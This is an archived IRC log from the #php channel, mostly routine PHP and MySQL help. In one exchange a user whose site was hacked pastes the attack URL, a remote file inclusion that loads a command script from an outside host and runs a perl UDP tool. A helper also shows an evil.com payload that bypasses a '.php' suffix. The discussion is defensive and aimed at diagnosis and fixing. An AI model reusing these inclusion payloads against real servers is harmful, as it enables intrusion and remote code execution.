IRC Logs

Network: freenode Channel: #php

	Enter your search terms Submit search form
	Web www.irclog.org

[00:03]<[sfrac]>hi, can you tell me why this script dosen't work? http://www.nopaste.info/index.php?id=14d6079b3e .. i want if i klick on ID1 switch zu id ==1
[00:06]<rrppygrvnm>!tell [slack] about register_globals
[00:07]<afd>anyone know something like hibernate (or better) for php?
[00:07]<afd>(not like AR..)
[00:08]<[sfrac]>caffinated: shit... thx.. ;)
[00:08]<axracruddv7>anyone know about securing inputs in php script??? i got hacked by some kiddy script who was including stuff from another server??
[00:09]<zdzxzzmfdgzx>jhgjkguiyt6: http://phpsec.org
[00:09]<axracruddv7>richardlynch thx
[00:09]<rrppygrvnm>jhgjkguiyt6: that's less about your inputs, and more about how you're using the data submitted by the inputs.
[00:10]<rrppygrvnm>my guess is that you're doing something like: include($_GET['page']);
[00:11]<axracruddv7>caffinated no! i have nothing like this!!
[00:11]<rrppygrvnm>if he is causing your server to execute remote code, then you have something that is doing it.
[00:11]<zdzxzzmfdgzx>If you got hacked as you describe, you have to have SOMETHING like that, somewhere, somehow...
[00:11]<||aw>!tell jhgjkguiyt6 about xss
[00:12]<axracruddv7>they used this link to get in
[00:12]<axracruddv7>http://broadband.spectravoice.com/web/index.php?op=http://otravesso.100free.com/cmd.txt?&cmd=cd%20/tmp;mkdir%20.tt;cd%20.tt;perl%20udp.txt%20200.168.245.68%2027015%2027015
[00:12]<zdzxzzmfdgzx>He only typed the one-liner obvious way of describing what you said happend, not the convoluted version.
[00:12]<||aw>jhgjkguiyt6: yeah, that sounds like you have include($op); ...guessing reg globals on too :)
[00:12]<rrppygrvnm>ROFL
[00:13]<rrppygrvnm>that looks like a shell_exec actually
[00:14]<||aw>heh, Owned Group OwnzZ YouR SySteM
[00:14]<rrppygrvnm>haha, nice
[00:14]<rrppygrvnm>yeah, you're right. include
[00:14]<axracruddv7>this script suck lol
[00:14]<rrppygrvnm>no, your code is suck.
[00:15]<axracruddv7>lol iam not the one who made it :P
[00:15]<||aw>jhgjkguiyt6: just make sure that op= something that you want it to equaly, like a number between 1 and 5 or a match from a set list of page names
[00:16]<||aw>jut don't eve trust user input. assume they will do something wrong
[00:16]<rrppygrvnm>since he could not see what was happening, i doubt he is qualified to fix it :P
[00:16]<||aw>edjumacation
[00:16]<axracruddv7>i see it now <td valign="top"><? include ($op.".php");?></td>
[00:16]<zjfnz>how do I insert an entry into an existing array at a specific location?
[00:16]<rrppygrvnm>wow. quality.
[00:16]<zdzxzzmfdgzx>So he's getting an education in the Real World that will eventually make him qualified. Isn't that why we bother?
[00:17]<||aw>hm, that .".php" should have failed it
[00:17]<||aw>at least for this one it would fail
[00:17]<rrppygrvnm>no, because it's easy to eliminate that
[00:17]<rrppygrvnm>$op = "http://evil.com/foo.txt&hi="
[00:17]<||aw>ah, the ? in that op
[00:17]<||aw>missed that
[00:18]<czzznzz>hi
[00:19]<czzznzz>does anyone know of a good php based PhoneBook
[00:19]<zjfnz>is the only way to insert an entry into an array is go through it and add it to a temporary array and copy it back? or is there a php function for this
[00:19]<||aw>i'm sure freshmeat.net has lots of reviews on them
[00:19]<czzznzz>ah
[00:19]<czzznzz>i found Address Book
[00:20]<||aw>roler: depends on where you want to insert it
[00:20]<czzznzz>but didn't know about freshmeat.net
[00:20]<zdzxzzmfdgzx>roler: Hunh? $array[] = 'value'; or $array[4] = 'fifth'; will do...
[00:20]<czzznzz>thanks ||cw
[00:20]<zdzxzzmfdgzx>roler: Or maybe you need http://php.net/array_splice
[00:20]<zjfnz>richardlynch; well If I have a [4] already, I want [4] to go to 5
[00:20]<kzzvzrys>good night :)
[00:20]<zdzxzzmfdgzx>roler: http://php.net/array_splice is DEFINITELY what you want.
[00:21]<txnpzxc>is there a way to load a module dynamicly and over ride a module that has been compilied in .. ?
[00:22]<||aw>ThePrhk: no
[00:22]<||aw>maybe with runkit
[00:22]<||aw>but therein lies madness
[00:22]<txnpzxc>so if gd is compilied in i would need to recompile php to update it .. ?
[00:24]<zdzxzzmfdgzx>ThePrhk: Technically, you could just re-compile the GD extension to PHP and install just the .so (or .dll) file, IF you match up all the versions of everything (Apache/PHP) in the header files and all that... Compiling your second time is about 10 X faster than your first, if you are newbie. :-)
[00:24]<zjfnz>thanks guys!
[00:25]<txnpzxc>the thing is this is on a production server that i really am not sure what all was compilied into php
[00:25]<sgjjffsd>Don't know if this is the right place to ask but... I would like to register a domain name and host it. Which hosts offer php 5 && the latest mysql for a fair price?
[00:25]<sgjjffsd>PS: I would like to register a .ru name
[00:26]<ptwzfzus>richardlynch you are a madman
[00:26]<txnpzxc>and i know there is not a backup that would beable recover froma botched recompile
[00:27]<zdzxzzmfdgzx>ThePrhk: phpinfo will tell you exactly what configure line was used -- Though if a package was "missing" and didn't get "in" due to compile errors, it would not "match" but then you can cross-check with the list of extensions for that -- again, all in phpinfo.
[00:27]<zdzxzzmfdgzx>ThePrhk: And, of course, you should backup your existing installation before doing a re-compile, to be sure you can revert.
[00:27]<ptwzfzus>in php, can I make an assignment statement within an if structure? like: 'if ($result = mysql_fetch_array($result))' to check to see if the result had any hits?
[00:27]<||aw>yes
[00:28]<ptwzfzus>and that assigns your array to result too?
[00:28]<ptwzfzus>obviously I know but just making sure
[00:28]<zdzxzzmfdgzx>PTWalrus: Sure -- so long as it's readable code.
[00:28]<||aw>if you are only expect 1 or 0 rows, that should work just fine
[00:28]<ptwzfzus>yeah thats the case cw... but I am all about hearing a more elegant way to do if if you guys have one and want to tell me :)
[00:29]<ptwzfzus>I try and be a stickler on good form
[00:30]<zdzxzzmfdgzx>As far as good form goes... $result is kinda generic, like $x. And we'd need way more context to say if the if(...) bit is readable or just cruft.
[00:30]<burxrggjg>is there a way to get all of the values in a column out of the database then print them on the screen? I can get an entire row, but not an entire column...
[00:31]<zdzxzzmfdgzx>Buchannon: You could iterate through all the rows and build up a column... Or do you just mean the field names? http://php.net/mysql_field_name
[00:32]<ptwzfzus>well, I want to check to see if a date has an entry in the database, and if not, create the entry with no information in it
[00:33]<cllyswnyzm>is there any way in the script to change what SMTP server the mail function uses?
[00:33]<burxrggjg>richardlynch: going through each row one by one would be quite taxing on mysql wouldn't it? Nah, not the field names but the values in a column
[00:33]<zdzxzzmfdgzx>PTWalrus: Create a UNIQUE INDEX on the date field. Do an INSERT. It will fail if it's not unique. Problem solved.
[00:34]<ptwzfzus>ahhh and that won't make any messy error messages?
[00:34]<zdzxzzmfdgzx>Buchannon: How many rows are there?...
[00:34]<ptwzfzus>I did make it unique
[00:34]<burxrggjg>richardlynch: well only 2 right now, but I'm expecting it to get ibgger
[00:34]<zdzxzzmfdgzx>PTWalrus: You control the error messages... if (mysql_errno() == 1062){ //duplicate insert, ignore it. }
[00:34]<zdzxzzmfdgzx>Buchannon: Define "bigger"
[00:35]<burxrggjg>richardlynch: hard to say right now, I think I found what I was looking for though with mysql_fet_array()
[00:36]<rrppygrvnm>better than letting it error is to use an ON DUPLICATE KEY syntax to take a different action.
[00:37]<rrppygrvnm>that way, you can update any existing parts if it already exists.
[00:41]<szgdsvzjd>On error reporting in php, is it possible to output errors to some log, without showing them to the user?
[00:41]<rrppygrvnm>http://php.net/set_error_handler
[00:42]<rrppygrvnm>see also: http://php.net/error_log
[00:42]<zdzxzzmfdgzx>sandstrom: That's kinda exactly what it says in php.ini... If you can't change php.ini, nor .htaccess, use set_error_handler as noted already.
[00:42]<rrppygrvnm>the second link is probably closer to what you want
[00:54]<jzpnu>hy all
[01:05]<lwjggywe>Hey there, anybody experience with mysql_connect NOT giving errors upon connect failures?
[01:05]<lwjggywe>I have this REALLY weird thing.. I can login to mysql as any random user and mysql_connect just returns a resource

Back to #php
Or go to some related logs:
#gentoo
#gentoo
#reactos
#gentoo
#css